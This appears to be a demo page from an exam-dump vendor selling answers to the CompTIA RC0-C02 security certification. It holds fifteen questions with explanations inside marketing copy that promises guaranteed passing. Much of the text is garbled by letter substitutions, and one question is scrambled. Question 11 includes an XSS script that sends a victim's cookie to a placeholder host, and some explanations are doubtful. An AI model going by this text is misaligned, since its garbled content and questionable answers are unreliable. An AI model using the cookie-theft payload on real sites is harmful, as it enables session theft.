150 likes | 184 Views
Download RC0-C02 Dumps PDF: [https://quizdumps.com/exam/rc0-c02-dumps/]<br>Discount Coupon Code: [Save20]<br><br>QuizDumps Provide you New Updated CompTIA Advanced Security Practitioner RC0-C02 Questions and Answers verified by CompTIA Specialist and CompTIA Advanced Security Practitioner experts. We guarantee your CompTIA Advanced Security Practitioner RC0-C02 exam success with 100% money back assurance. you can easily pass your RC0-C02 exam in just first attempt. So feel free to get benefits from such valuable RC0-C02 Exam Dumps and enjoy brilliant success in CompTIA Advanced Security Practitioner RC0-C02 exam.
E N D
CompTIA RC0-C02 Exam CompTIA Advanced Security Practitioner QUESTIONS & ANSWERS (Demo Version) Thank You For Downloading RC0-C02 Exam PDF Demo QuizDumps helps you to prepare CompTIA Advanced Security Practitioner exam. Get most Up-to-Date CompTIA RC0-C02 exam Questions and Answers and pass the RC0- C02 exam in the first attempt. Get Full RC0-C02 Exam PDF Here https://quizdumps.com/exam/rc0-c02-dumps/
Version: 8.0 Question 1 An administrator wants to enable policy based feeible mandatory access controls on an open source OS to prevent abnormal applicaton modifcatons or eeecutonss Which of the following would BEST accomplish this? As Access control lists Bs SELinue Cs IPtables frewall Ds HIPS Aoswern B Eeplanatonn The most common open source operatng system is LINUXs Security-Enhanced Linue (SELinue) was created by the United States Natonal Security Agency (NSA) and is a Linue kernel security module that provides a mechanism for supportng access control security policies, including United States Department of Defense–style mandatory access controls (MAC)s NSA Security-enhanced Linue is a set of patches to the Linue kernel and some utlites to incorporate a strong, feeible mandatory access control (MAC) architecture into the major subsystems of the kernels It provides an enhanced mechanism to enforce the separaton of informaton based on confdentality and integrity requirements, which allows threats of tampering and bypassing of applicaton security mechanisms to be addressed and enables the confnement of damage that can be caused by malicious or fawed applicatonss Incorrect Answersn An An access control list (ACL) is a list of permissions atached to an objects An ACL specifes which users or system processes are granted access to objects, as well as what operatons are allowed on given objectss ACLs do not enable policy based feeible mandatory access controls to prevent abnormal applicaton modifcatons or eeecutonss Cn A frewall is used to control data leaving a network or entering a network based on source and destnaton IP address and port numberss IPTables is a Linue frewalls However, it does not enable policy based feeible mandatory access controls to prevent abnormal applicaton modifcatons or eeecutonss Dn Host-based intrusion preventon system (HIPS) is an installed sofware package which monitors a single host for suspicious actvity by analyzing events occurring within that hosts It does not enable policy based feeible mandatory access controls to prevent abnormal applicaton modifcatons or eeecutonss Referencesn htpsn::enswikipediasorg:wiki:Security-Enhanced_Linue Question 2 Company ABC’s SAN is nearing capacity, and will cause costly downtmes if servers run out disk spaces Which of the following is a more cost efectve alternatve to buying a new SAN? As Enable multpath to increase availability
Bs Enable deduplicaton on the storage pools Cs Implement snapshots to reduce virtual disk size Ds Implement replicaton to ofsite datacenter Aoswern B Eeplanatonn Storage-based data deduplicaton reduces the amount of storage needed for a given set of fless It is most efectve in applicatons where many copies of very similar or even identcal data are stored on a single disks It is common for multple copies of fles to eeist on a SANs By eliminatng (deduplicatng) repeated copies of the fles, we can reduce the disk space used on the eeistng SANs This soluton is a cost efectve alternatve to buying a new SANs Incorrect Answersn An Multpathing enables multple links to transfer the data to and from the SANs This improves performance and link redundancys However, it has no efect on the amount of data on the SANs Cn Snapshots would not reduce the amount of data stored on the SANs Dn Replicatng the data on the SAN to an ofsite datacenter will not reduce the amount of data stored on the SANs It would just create another copy of the data on the SAN in the ofsite datacenters Referencesn htpsn::enswikipediasorg:wiki:Data_deduplicaton Question 3 A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systemss The security authentcaton on the Windows domain is set to the highest levels Windows users are statng that they cannot authentcate to the UNIX shares Which of the following setngs on the UNIX server would correct this problem? As Refuse LM and only accept NTLMv2 Bs Accept only LM Cs Refuse NTLMv2 and accept LM Ds Accept only NTLM Aoswern A Eeplanatonn In a Windows network, NT LAN Manager (NTLM) is a suite of Microsof security protocols that provides authentcaton, integrity, and confdentality to userss NTLM is the successor to the authentcaton protocol in Microsof LAN Manager (LANMAN or LM), an older Microsof product, and atempts to provide backwards compatbility with LANMANs NTLM version 2 (NTLMv2), which was introduced in Windows NT 4s0 SP4 (and natvely supported in Windows 2000), enhances NTLM security by hardening the protocol against many spoofng atacks, and adding the ability for a server to authentcate to the clients This queston states that the security authentcaton on the Windows domain is set to the highest levels This will be NTLMv2s Therefore, the answer to the queston is to allow NTLMv2 which will enable the Windows users to connect to the UNIX servers To improve security, we should disable the old and
insecure LM protocol as it is not used by the Windows computerss Incorrect Answersn Bn The queston states that the security authentcaton on the Windows domain is set to the highest levels This will be NTLMv2, not LMs Cn The queston states that the security authentcaton on the Windows domain is set to the highest levels This will be NTLMv2, not LM so we need to allow NTLMv2s Dn The queston states that the security authentcaton on the Windows domain is set to the highest levels This will be NTLMv2, not NTLM (version1)s Referencesn htpsn::enswikipediasorg:wiki:NT_LAN_Manager Question 4 A security architect is designing a new infrastructure using both type 1 and type 2 virtual machiness In additon to the normal complement of security controls (esgs antvirus, host hardening, HIPS:NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMss Which of the following will meet this goal without requiring any hardware pass-through implementatons? As vTPM Bs HSM Cs TPM Ds INE Aoswern A Eeplanatonn A Trusted Platorm Module (TPM) is a microchip designed to provide basic security-related functons, primarily involving encrypton keyss The TPM is usually installed on the motherboard of a computer, and it communicates with the remainder of the system by using a hardware buss A vTPM is a virtual Trusted Platorm Modules IBM eetended the current TPM V1s2 command set with virtual TPM management commands that allow us to create and delete instances of TPMss Each created instance of a TPM holds an associaton with a virtual machine (VM) throughout its lifetme on the platorms Incorrect Answersn Bn A hardware security module (HSM) is a physical computng device that safeguards and manages digital keys for strong authentcaton and provides cryptoprocessings These modules traditonally come in the form of a plug-in card or an eeternal device that ataches directly to a computer or network servers This soluton would require hardware pass-throughs Cn A Trusted Platorm Module (TPM) is a microchip designed to provide basic security-related functons, primarily involving encrypton keyss The TPM is usually installed on the motherboard of a computer, and it communicates with the remainder of the system by using a hardware buss Virtual machines cannot access a hardware TPMs Dn INE (intelligent network element) is not used for storing cryptographic keyss Referencesn htpsn::enswikipediasorg:wiki:Hardware_security_module htpn::researcherswatsonsibmscom:researcher:view_groupsphp?idd2280
Question 5 A user has a laptop confgured with multple operatng system installatonss The operatng systems are all installed on a single SSD, but each has its own partton and logical volumes Which of the following is the BEST way to ensure confdentality of individual operatng system data? As Encrypton of each individual partton Bs Encrypton of the SSD at the fle level Cs FDE of each logical volume on the SSD Ds FDE of the entre SSD as a single disk Aoswern A Eeplanatonn In this queston, we have multple operatng system installatons on a single disks Some operatng systems store their boot loader in the MBR of the disks However, some operatng systems install their boot loader outside the MBR especially when multple operatng systems are installeds We need to encrypt as much data as possible but we cannot encrypt the boot loaderss This would prevent the operatng systems from loadings Therefore, the soluton is to encrypt each individual partton separatelys Incorrect Answersn Bn The queston is asking for the BEST way to ensure confdentality of individual operatng system datas Individual fle encrypton could work but if fles are ever added to the operatng systems (for updates etcs), you would have to manually encrypt the new fles as wells A beter soluton would be to encrypt the entre parttons That way any new fles added to the operatng system would be automatcally encrypteds Cn You cannot perform full disk encrypton on an individual volumes Full disk encrypton encrypts the entre disks Dn FDE of the entre SSD as a single disk would encrypt the boot loaders which would prevent the operatng systems from bootngs Question 6 Afer being notfed of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping carts SELECT ITEM FROM CART WHERE ITEMdADDSLASHES($USERINPUT); The programmer found that every tme a user adds an item to the cart, a temporary fle is created on the web server :tmp directorys The temporary fle has a name which is generated by concatenatng the content of the $USERINPUT variable and a tmestamp in the form of MM-DD-YYYY, (esgs smartphone-12- 28-2013stmp) containing the price of the item being purchaseds Which of the following is MOST likely being eeploited to manipulate the price of a shopping cart’s items? As Input validaton Bs SQL injecton Cs TOCTOU
Ds Session hijacking Aoswern C Eeplanatonn In this queston, TOCTOU is being eeploited to allow the user to modify the temp fle that contains the price of the items In sofware development, tme of check to tme of use (TOCTOU) is a class of sofware bug caused by changes in a system between the checking of a conditon (such as a security credental) and the use of the results of that checks This is one eeample of a race conditons A simple eeample is as followsn Consider a Web applicaton that allows a user to edit pages, and also allows administrators to lock pages to prevent editngs A user requests to edit a page, getng a form which can be used to alter its contents Before the user submits the form, an administrator locks the page, which should prevent editngs However, since editng has already begun, when the user submits the form, those edits (which have already been made) are accepteds When the user began editng, the appropriate authorizaton was checked, and the user was indeed allowed to edits However, the authorizaton was used later, at a tme when edits should no longer have been alloweds TOCTOU race conditons are most common in Unie between operatons on the fle system, but can occur in other conteets, including local sockets and improper use of database transactonss Incorrect Answersn An Input validaton is used to ensure that the correct data is entered into a felds For eeample, input validaton would prevent leters typed into a feld that eepects number from being accepteds The eeploit in this queston is not an eeample of input validatons Bn SQL injecton is a type of security eeploit in which the atacker adds Structured Query Language (SQL) code to a Web form input boe to gain access to resources or make changes to datas The eeploit in this queston is not an eeample of a SQL injecton atacks Dn Session hijacking, also known as TCP session hijacking, is a method of taking over a Web user session by obtaining the session ID and masquerading as the authorized users The eeploit in this queston is not an eeample of session hijackings Referencesn htpsn::enswikipediasorg:wiki:Time_of_check_to_tme_of_use Question 7 The administrator is troubleshootng availability issues on an FCoE-based storage array that uses deduplicatons The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a diferent manufacturer in order to access the dat as Which of the following issues may potentally occur? As The data may not be in a usable formats Bs The new storage array is not FCoE baseds Cs The data may need a fle system checks Ds The new storage array also only has a single controllers Aoswern B Eeplanatonn Fibre Channel over Ethernet (FCoE) is a computer network technology that encapsulates Fibre Channel
frames over Ethernet networkss This allows Fibre Channel to use 10 Gigabit Ethernet networks (or higher speeds) while preserving the Fibre Channel protocols When moving the disks to another storage array, you need to ensure that the array supports FCoE, not just regular Fiber Channels Fiber Channel arrays and Fiber Channel over Ethernet arrays use diferent network connectons, hardware and protocolss Fiber Channel arrays use the Fiber Channel protocol over a dedicated Fiber Channel network whereas FCoE arrays use the Fiber Channel protocol over an Ethernet networks Incorrect Answersn An It is unlikely that the data will not be in a usable formats Fiber Channel LUNs appear as local disks on a Windows computers The computer then creates an NTFS volume on the fber channel LUNs The storage array does not see the NTFS fle system or the data stored on its FCoE arrays only see the underlying block level storages Cn The data would not need a fle system checks FCoE arrays use block level storage and do not check the fle systems Any fle system checks would be performed by a Windows computers Even if this happened, the data would be accessible afer the checks Dn The new storage array also having a single controller would not be a problems Only one controller is requireds Referencesn htpsn::enswikipediasorg:wiki:Fibre_Channel_over_Ethernet Question 8 Joe, a hacker, has discovered he can specifcally craf a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code eeecuton in the conteet of the victm’s privilege levels The browser crashes due to an eecepton error when a heap memory that is unused is accesseds Which of the following BEST describes the applicaton issue? As Integer overfow Bs Click-jacking Cs Race conditon Ds SQL injecton Es Use afer free Fs Input validaton Aoswern E Eeplanatonn Use-Afer-Free vulnerabilites are a type of memory corrupton faw that can be leveraged by hackers to eeecute arbitrary codes Use Afer Free specifcally refers to the atempt to access memory afer it has been freed, which can cause a program to crash or, in the case of a Use-Afer-Free faw, can potentally result in the eeecuton of arbitrary code or even enable full remote code eeecuton capabilitess According to the Use Afer Free defniton on the Common Weakness Enumeraton (CWE) website, a Use Afer Free scenario can occur when "the memory in queston is allocated to another pointer validly at some point afer it has been freeds The original pointer to the freed memory is used again and points to somewhere within the new allocatons As the data is changed, it corrupts the validly used memory; this induces undefned behavior in the processs"
Incorrect Answersn An Integer overfow is the result of an atempt by a CPU to arithmetcally generate a number larger than what can ft in the devoted memory storage spaces Arithmetc operatons always have the potental of returning uneepected values, which may cause an error that forces the whole program to shut downs This is not what is described in this questons Bn Clickjacking is a malicious technique of tricking a Web user into clicking on something diferent from what the user perceives they are clicking on, thus potentally revealing confdental informaton or taking control of their computer while clicking on seemingly innocuous web pagess This is not what is described in this questons Cn A race conditon is an undesirable situaton that occurs when a device or system atempts to perform two or more operatons at the same tme, but because of the nature of the device or system, the operatons must be done in the proper sequence to be done correctlys This is not what is described in this questons Dn SQL injecton is a type of security eeploit in which the atacker adds Structured Query Language (SQL) code to a Web form input boe to gain access to resources or make changes to datas This is not what is described in this questons Fn Input validaton is used to ensure that the correct data is entered into a felds For eeample, input validaton would prevent leters typed into a feld that eepects number from being accepteds This is not what is described in this questons Referencesn htpn::wwwswebopediascom:TERM:U:use-afer-freeshtml htpsn::enswikipediasorg:wiki:Clickjacking htpn::searchstoragestechtargetscom:defniton:race-conditon Question 9 A developer is determining the best way to improve security within the code being developeds The developer is focusing on input felds where customers enter their credit card detailss Which of the following techniques, if implemented in the code, would be the MOST efectve in protectng the felds from malformed input? As Client side input validaton Bs Stored procedure Cs Encryptng credit card details Ds Regular eepression matching Aoswern D Eeplanatonn Regular eepression matching is a technique for reading and validatng input, partcularly in web sofwares This queston is asking about securing input felds where customers enter their credit card detailss In this case, the eepected input into the credit card number feld would be a sequence of numbers of a certain lengths We can use regular eepression matching to verify that the input is indeed a sequence of numberss Anything that is not a sequence of numbers could be malicious codes Incorrect Answersn An Client side input validaton could be used to validate the input into input feldss Client side input validaton is where the validaton is performed by the web browsers However this queston is asking for
the BEST answers A user with malicious intent could bypass the client side input validaton whereas it would be much more difcult to bypass regular eepression matching implemented in the applicaton codes Bn A stored procedure is SQL code saved as a scripts A SQL user can run the stored procedure rather than typing all the SQL code contained in the stored procedures A stored procedure is not used for validatng inputs Cn Any stored credit card details should be encrypted for security purposess Also a secure method of transmission such as SSL or TLS should be used to encrypt the data when transmitng the credit card number over a network such as the Internets However, encryptng credit card details is not a way of securing the input felds in an applicatons Question 10 A security administrator was doing a packet capture and notced a system communicatng with an unauthorized address within the 2001nn:32 prefes The network administrator confrms there is no IPv6 routng into or out of the networks Which of the following is the BEST course of acton? As Investgate the network trafc and block UDP port 3844 at the frewall Bs Remove the system from the network and disable IPv6 at the router Cs Locate and remove the unauthorized 6to4 relay from the network Ds Disable the switch port and block the 2001nn:32 trafc at the frewall Aoswern A Eeplanatonn The 2001nn:32 prefe is used for Teredo tunnelings Teredo is a transiton technology that gives full IPv6 connectvity for IPv6-capable hosts that are on the IPv4 Internet but have no natve connecton to an IPv6 networks Unlike similar protocols, it can perform its functon even from behind network address translaton (NAT) devices such as home routerss Teredo provides IPv6 (Internet Protocol version 6) connectvity by encapsulatng IPv6 datagram packets within IPv4 User Datagram Protocol (UDP) packetss Teredo routes these datagrams on the IPv4 Internet and through NAT devicess Teredo nodes elsewhere on the IPv6 network (called Teredo relays) receive the packets, decapsulate them, and pass them ons The Teredo server listens on UDP port 3844s Teredo clients are assigned an IPv6 address that starts with the Teredo prefe (2001nn:32)s In this queston, the BEST course of acton would be to block UDP port 3844 at the frewalls This will block the unauthorized communicatons You can then investgate the trafc within the networks Incorrect Answersn Bn Disabling IPv6 at the router will not help if the IPv6 trafc is encapsulated in IPv4 frames using Teredos The queston also states that there is no IPv6 routng into or out of the networks Cn 6to4 relays work in a similar way to Teredos However, the addresses used by 6to4 relays start with 2002nn whereas Teredo addresses start with 2001s Therefore, a 6to4 relay is not being used in this queston so this answer is incorrects Dn This queston is asking for the BEST solutons Disabling the switch port would take the system connected to it ofine and blocking trafc destned for 2001nn:32 at the frewall would prevent inbound Teredo communicatons (if you block the trafc on the inbound interface)s However, blocking port UDP 3844 would sufce and investgatng the trafc is always a beter soluton than just disconnectng a
system from the networks Referencesn htpsn::enswikipediasorg:wiki:Teredo_tunneling Question 11 A security administrator notces the following line in a server's security logn <input named'credentals' requestsgetParameter('><script>documentslocatond'htpn::badsitescom:?qd'documentscookie<:script>' ) + "'; The administrator is concerned that it will take the developer a lot of tme to fe the applicaton that is running on the servers Which of the following should the security administrator implement to prevent this partcular atack? typed'TEXT' valued'" + As WAF Bs Input validaton Cs SIEM Ds Sandboeing Es DAM Aoswern A Eeplanatonn The atack in this queston is an XSS (Cross Site Scriptng) atacks We can prevent this atack by using a Web Applicaton Firewalls A WAF (Web Applicaton Firewall) protects a Web applicaton by controlling its input and output and the access to and from the applicatons Running as an appliance, server plug-in or cloud-based service, a WAF inspects every HTML, HTTPS, SOAP and XML-RPC data packets Through customizable inspecton, it is able to prevent atacks such as XSS, SQL injecton, session hijacking and bufer overfows, which network frewalls and intrusion detecton systems are ofen not capable of doings A WAF is also able to detect and prevent new unknown atacks by watching for unfamiliar paterns in the trafc datas A WAF can be either network-based or host-based and is typically deployed through a proey and placed in front of one or more Web applicatonss In real tme or near-real tme, it monitors trafc before it reaches the Web applicaton, analyzing all requests using a rule base to flter out potentally harmful trafc or trafc paternss Web applicaton frewalls are a common security control used by enterprises to protect Web applicatons against zero-day eeploits, impersonaton and known vulnerabilites and atackerss Incorrect Answersn Bn Input validaton is used to ensure that the correct data is entered into a felds For eeample, input validaton would prevent leters typed into a feld that eepects number from being accepteds Input validaton is not an efectve defense against an XSS atacks Cn Security informaton and event management (SIEM) is an approach to security management used to provide a view of an organizaton’s IT securitys It is an informaton gathering process; it does not in itself provide securitys Dn Sandboeing is a process of isolatng an applicaton from other applicatonss It is ofen used when developing and testng new applicatons It is not used to defend against an XSS atacks En DAM (digital asset management) is a system that creates a centralized repository for digital fles that
allows the content to be archived, searched and retrieveds It is not used to defend against an XSS atacks Referencesn htpn::searchsecuritystechtargetscom:defniton:Web-applicaton-frewall-WAF Question 12 A popular commercial virtualizaton platorm allows for the creaton of virtual hardwares To virtual machines, this virtual hardware is indistnguishable from real hardwares By implementng virtualized TPMs, which of the following trusted system concepts can be implemented? As Sofware-based root of trust Bs Contnuous chain of trust Cs Chain of trust with a hardware root of trust Ds Sofware-based trust anchor with no root of trust Aoswern C Eeplanatonn A Trusted Platorm Module (TPM) is a microchip designed to provide basic security-related functons, primarily involving encrypton keyss The TPM is usually installed on the motherboard of a computer, and it communicates with the remainder of the system by using a hardware buss A vTPM is a virtual Trusted Platorm Module; a virtual instance of the TPMs IBM eetended the current TPM V1s2 command set with virtual TPM management commands that allow us to create and delete instances of TPMss Each created instance of a TPM holds an associaton with a virtual machine (VM) throughout its lifetme on the platorms The TPM is the hardware root of trusts Chain of trust means to eetend the trust boundary from the root(s) of trust, in order to eetend the collecton of trustworthy functonss Implies:entails transitve trusts Therefore a virtual TPM is a chain of trust from the hardware TPM (root of trust)s Incorrect Answersn An A vTPM is a virtual instance of the hardware TPMs Therefore, the root of trust is a hardware root of trust, not a sofware-based root of trusts Bn The chain of trust needs a roots In this case, the TPM is a hardware root of trusts This answer has no root of trusts Dn There needs to be a root of trusts In this case, the TPM is a hardware root of trusts This answer has no root of trusts Referencesn htpsn::wwwscylabscmusedu:tw:slides:martn-tw101spdf Question 13 An organizaton is concerned with potental data loss in the event of a disaster, and created a backup datacenter as a mitgaton strategys The current storage method is a single NAS used by all servers in both datacenterss Which of the following optons increases data availability in the event of a datacenter failure? As Replicate NAS changes to the tape backups at the other datacenters
Bs Ensure each server has two HBAs connected through two routes to the NASs Cs Establish deduplicaton across diverse storage pathss Ds Establish a SAN that replicates between datacenterss Aoswern D Eeplanatonn A SAN is a Storage Area Networks It is an alternatve to NAS storages SAN replicaton is a technology that replicates the data on one SAN to another SAN; in this case, it would replicate the data to a SAN in the backup datacenters In the event of a disaster, the SAN in the backup datacenter would contain all the data on the original SANs Array-based replicaton is an approach to data backup in which compatble storage arrays use built-in sofware to automatcally copy data from one storage array to anothers Array-based replicaton sofware runs on one or more storage controllers resident in disk storage systems, synchronously or asynchronously replicatng data between similar storage array models at the logical unit number (LUN) or volume block levels The term can refer to the creaton of local copies of data within the same array as the source data, as well as the creaton of remote copies in an array situated of sites Incorrect Answersn An Replicatng NAS changes to the tape backups at the other datacenter would result in a copy of the NAS data in the backup datacenters However, the data will be stored on tapes In the event of a disaster, you would need another NAS to restore the data tos Bn Ensuring that each server has two routes to the NAS is not a viable solutons The NAS is stll a single point of failures In the event of a disaster, you could lose the NAS and all the data on its Cn Deduplicaton is the process of eliminatng multple copies of the same data to save storage spaces The NAS is stll a single point of failures In the event of a disaster, you could lose the NAS and all the data on its Referencesn htpn::searchdisasterrecoverystechtargetscom:defniton:Array-based-replicaton Question 14 An applicaton present on the majority of an organizaton’s 1,000 systems is vulnerable to a bufer overfow atacks Which of the following is the MOST comprehensive way to resolve the issue? As Deploy custom HIPS signatures to detect and block the atackss Bs Validate and deploy the appropriate patchs Cs Run the applicaton in terminal services to reduce the threat landscapes Ds Deploy custom NIPS signatures to detect and block the atackss Aoswern B Eeplanatonn If an applicaton has a known issue (such as susceptbility to bufer overfow atacks) and a patch is released to resolve the specifc issue, then the best soluton is always to deploy the patchs A bufer overfow occurs when a program or process tries to store more data in a bufer (temporary data storage area) than it was intended to holds Since bufers are created to contain a fnite amount of data, the eetra informaton - which has to go somewhere - can overfow into adjacent bufers, corruptng or
overwritng the valid data held in thems Although it may occur accidentally through programming error, bufer overfow is an increasingly common type of security atack on data integritys In bufer overfow atacks, the eetra data may contain codes designed to trigger specifc actons, in efect sending new instructons to the atacked computer that could, for eeample, damage the user's fles, change data, or disclose confdental informatons Bufer overfow atacks are said to have arisen because the C programming language supplied the framework, and poor programming practces supplied the vulnerabilitys Incorrect Answersn An This queston is asking for the MOST comprehensive way to resolve the issues A HIPS (Host Intrusion Preventon System) with custom signatures may ofer some protecton against an applicaton that is vulnerable to bufer overfow atackss However, an applicaton that is NOT vulnerable to bufer overfow atacks (a patched applicaton) is a beter solutons Cn This queston is asking for the MOST comprehensive way to resolve the issues Running the applicaton in terminal services may reduce the threat landscapes However, it doesn’t resolve the issues Patching the applicaton to eliminate the threat is a beter solutons Dn This queston is asking for the MOST comprehensive way to resolve the issues A NIPS (Network Intrusion Preventon System) with custom signatures may ofer some protecton against an applicaton that is vulnerable to bufer overfow atackss However, an applicaton that is NOT vulnerable to bufer overfow atacks (a patched applicaton) is a beter solutons Referencesn htpn::searchsecuritystechtargetscom:defniton:bufer-overfow Question 15 select id, frstname, lastname from authors User inputd frstnamed Hack;man lastnamedJohnson Which of the following types of atacks is the user atemptng? As XML injecton Bs Command injecton Cs Cross-site scriptng Ds SQL injecton Aoswern D Eeplanatonn The code in the queston is SQL codes The atack is a SQL injecton atacks SQL injecton is a code injecton technique, used to atack data-driven applicatons, in which malicious SQL statements are inserted into an entry feld for eeecuton (esgs to dump the database contents to the atacker)s SQL injecton must eeploit a security vulnerability in an applicaton's sofware, for eeample, when user input is either incorrectly fltered for string literal escape characters embedded in SQL statements or user input is not strongly typed and uneepectedly eeecuteds SQL injecton is mostly known as an atack vector for websites but can be used to atack any type of SQL databases Incorrect Answersn An The code in the queston is not XML codes Therefore this is not an XML injecton atack so this answer is incorrects
Bn Command injecton is an atack in which the goal is eeecuton of arbitrary commands on the host operatng system via a vulnerable applicatons Command injecton atacks are possible when an applicaton passes unsafe user supplied data (forms, cookies, HTTP headers etcs) to a system shells The code in the queston is not the type of code you would use in a command injecton atacks Cn Cross-site scriptng (XSS) is a type of computer security vulnerability typically found in Web applicatonss XSS enables atackers to inject client-side script into Web pages viewed by other userss The code in the queston is not the type of code you would use in an XSS atacks Referencesn htpn::enswikipediasorg:wiki:SQL_injecton
QuizDumps CompTIA Advanced Security Practitioner professionals and CompTIA specialist provide you verified CompTIA RC0-C02 exam dumps. Our RC0-C02 PDF questions come with 100% money back guarantee. QuizDumps have already helped 100s of certification% RC0-C02 students in passing RC0-C02 exam with high marks in first attempt. In case of faliur you can get your money back. (Start Your RC0-C02 Exam Prepration Now) Download All RC0-C02 Questions From https://quizdumps.com/exam/rc0-c02-dumps/ 100% Guaranteed Success in RC0-C02 Exam.